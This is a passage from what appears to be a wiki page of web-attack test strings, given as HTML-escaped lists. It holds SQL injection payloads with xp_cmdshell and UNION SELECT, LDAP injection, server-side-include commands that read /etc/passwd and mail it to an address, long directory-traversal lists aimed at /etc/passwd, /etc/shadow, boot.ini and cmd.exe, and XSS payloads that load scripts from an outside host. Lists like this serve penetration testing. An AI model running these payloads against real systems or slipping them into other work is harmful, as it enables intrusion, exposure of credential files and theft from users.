' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
